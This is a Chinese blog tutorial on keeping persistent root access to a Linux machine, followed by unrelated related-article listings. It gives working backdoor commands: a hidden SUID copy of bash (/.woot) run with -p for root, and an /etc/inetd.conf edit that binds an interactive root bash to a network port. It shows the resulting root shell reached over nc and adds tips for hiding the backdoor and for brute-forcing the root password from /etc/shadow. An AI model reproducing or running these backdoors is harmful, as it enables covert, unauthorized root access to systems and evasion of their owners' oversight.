LINUX的两种后门总结(suid shell与inetd)
前提:
你现在已经是root用户, 想留一个后门以便日后再一次进入。
系统环境:
1 |
dawg:~ # uname -a |
2 |
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux |
1. SUID shell
关于SUID位的知识,请点这里
首先, 先切换成为root用户,并执行以下的命令:
1 |
dawg:~ # cp /bin/bash /.woot |
2 |
dawg:~ # chmod 4755 /.woot |
3 |
dawg:~ # ls -al /.woot |
4 |
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot |
当然, 你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件( 在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏) .
现在,做为一个普通用户,我们来启用这个后门:
1 |
fw@dawg:~$ id |
2 |
uid=1000(fw) gid=1000(fw) groups=1000(fw) |
3 |
fw@dawg:~$ /.woot |
4 |
.woot-2.05b$ id |
5 |
uid=1000(fw) gid=1000(fw) groups=1000(fw) |
6 |
.woot-2.05b$ |
法克!为什么不行呢?
因为 bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:
1 |
.woot-2.05b$ /.woot -p |
2 |
.woot-2.05b # id |
3 |
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw) |
使用-p参数来获取一个root shell. 这个euid的意思是 effective user id(关于这些ID的知识,可以戳这里)
这里要特别注意的是,作为一个普通用户执行这个SUID shell时,一定要使用全路径。
小知识:
如何查找那些具有 SUID 的文件:
1 |
dawg:~ # find / -perm +4000 -ls |
这时就会返回具有SUID位的文件啦。
2. 远程后门:利用 /etc/inetd.conf
我们使用vi来修改 /etc/inetd.conf 文件
原文件:
1 |
#chargen dgram udp wait root internal |
2 |
#discard stream tcp nowait root internal |
3 |
#discard dgram udp wait root internal |
4 |
#daytime stream tcp nowait root internal |
修改为:
1 |
#discard stream tcp nowait root internal |
2 |
#discard dgram udp wait root internal |
3 |
daytime stream tcp nowait root /bin/bash bash -i |
开启inetd:
1 |
dawg:~ # inetd |
如果要强制重启inetd:
1 |
dawg:~ # ps -ef | grep inetd |
2 |
root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd |
3 |
root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd |
4 |
dawg:~ # kill -HUP 362 |
现在我们就可以用nc来搞定:
01 |
C:tools<nc -vv 192.168.1.77 13 |
02 |
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA |
03 |
(UNKNOWN) [192.168.1.77] 13 (daytime) open |
04 |
05 |
bash: no job control in this shell |
06 |
bash-2.05b # bash-2.05b# |
07 |
bash-2.05b # id |
08 |
uid=0(root) gid=0(root) groups=0(root) |
09 |
bash-2.05b # uname -a |
10 |
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux |
小贴士:
我们来一招更厉害的:
我们可以修改/etc/services文件,加入以下的东西:
1 |
woot 6666/tcp #evil backdoor service |
然后修改/etc/inetd.conf :
1 |
woot stream tcp nowait root /bin/bash bash -i |
我们可以修改成一些常见的端口,以实现隐藏。
其实 /etc/shadow文件,爆破root的密码才最保险啊!
LINUX的两种后门总结(suid shell与inetd)的更多相关文章
- linux 的 两种磁盘扩容
当LVM分区空间不足的时候,可以进行扩容.主要的扩容方法有两种: 通过空余的磁盘进行扩容,这个方法比较简单,不会对原有数据有影响.将其他LVM分区空间取出一部分给需要扩容的LVM分区.下面就分别具体介 ...
- Linux上两种网络连接方式
模式一:NAT方式好处:路由器更换,或者交换机更换,网络仍然可以使用,所用使用最多 准备工作: 查看VMware服务器启动情况,五个全开模式 vmnet8开启模式 1 配置VMware交换机的ip地址 ...
- [ 总结 ] Linux下两种常用的双网卡绑定
1. mode=0 (round-robin) 链路聚合:将两个或者更多数据信道结合成一个单一的信道,该信道以一个更高带宽的逻辑链路出现,链路聚合一般用来连接一个或多个带宽需求量大的设备,链路聚合是指 ...
- 两种“新型”的javaweb后门(jspx和Java Logger)
利用这个可以突破st2下 强制jsp跳转login.jsp 利用jspx解决jsp后缀被限制拿shell - Hack Blog | 黑客博客http://www.hackblog.cn/post ...
- Linux下安装mysql(yum和源码编译两种方式)
这里介绍Linux下两种安装mysql的方式:yum安装和源码编译安装. 1. yum安装 (1)首先查看centos自带的mysql是否被安装: # yum list installed |grep ...
- Linux系统中存储设备的两种表示方法
转:https://blog.csdn.net/holybin/article/details/38637381 一.对于IDE接口的硬盘的两种表示方法: 1.IDE接口硬盘,对于整块硬盘的两种表示方 ...
- Linux中的两种守护进程stand alone和xinetd
Linux中的两种守护进程stand alone和xinetd --http://www.cnblogs.com/itech/archive/2010/12/27/1914846.html#top 一 ...
- Linux安装MySQL的两种方法
转载:http://blog.csdn.net/superchanon/article/details/8546254/ 1. 运行平台:CentOS 6.3 x86_64,基本等同于RH ...
- 云服务器 ECS Linux 服务器修改时区的两种方式
在云服务器 ECS Linux 系统中,以 Centos6.5 为例,可以通过如下两种方式,修改系统时区: 可以使用命令 tzselect,修改时区.操作示例: [root@localhost ~]# ...
随机推荐
- 结合C++和GDAL实现shapefile(shp)文件的读取
工具:vs2012+GDAL 2.0 数据:中国省界SHP文件bou2_4p.shp 可点击下载 包含头文件: #include "ogrsf_frmts.h" 代码: int ...
- win7系统cmd命令切换到指定文件夹目录
win7 系统下的cmd命令,直接cd命令切换盘符和以往有些不同,现在默认只能在当前盘符中改变目录,如果要改变盘符则需要多加一个/d命令.如下图所示:(对cd命令的帮助 大家可借助help cd命令进 ...
- 数据摘要算法的测试效率(SHA、MD5和CRC32)
1.算法概述 数据摘要算法是密码学算法中非常重要的一个分支,它通过对所有数据提取指纹信息以实现数据签名.数据完整性校验等功能,由于其不可逆性,有时候会被用做敏感信息的加密.数据摘要算法也被称为哈希(H ...
- [CareerCup] 8.7 Chat Server 聊天服务器
8.7 Explain how you would design a chat server. In particular, provide details about the various bac ...
- Linux第三次学习笔记
#信息的表示和处理 三种重要的数字表示 1. 无符号数编码: 基于传统的二进制表示法,表示大于或者等于零的数字. 2. 补码编码: 表示有符号数整数的最常见的方式,有符号数就是只可 以为正或者为负的数 ...
- Arduino小车学习与研究博客
Arduino小车学习与研究博客 信安系统设计基础实践模块 Arduino小车学习与研究 ================== 陈都(20135328) 余佳源(20135321) 莫凡(201352 ...
- IOS开发之——keychain使用介绍 保护本地文件的安全
iOS的keychain服务提供了一种安全的保存私密信息(密码,序列号,证书等)的方式.每个ios程序都有一个独立的keychain存储.从ios 3.0开始,跨程序分享keychain变得可行. 使 ...
- unity3d 纹理动画
不知道大家有没有玩过赛车游戏 赛车游戏的跑道有路标,如下图 玩过赛车游戏的都知道,大多数赛车游戏的路标是会动的,如上图,它会从右往左运动 不会发动态图,大家脑补一下吧 没有玩过赛车游戏的也不要紧,大家 ...
- Android Studio配置Git及Git文件状态说明
Android Studio配置Git还是比较简单的,麻烦的是可能中间出现各种问题.如果你想了解或感兴趣,请往下看. 首先你得下载Git客户端,网址:http://git-scm.com/downlo ...
- redis学习笔记——(3)
7.Redis中的set类型 sadd set value:向set中添加元素value. srem set value:删除set中的元素value. spop set:随机返回并删除s ...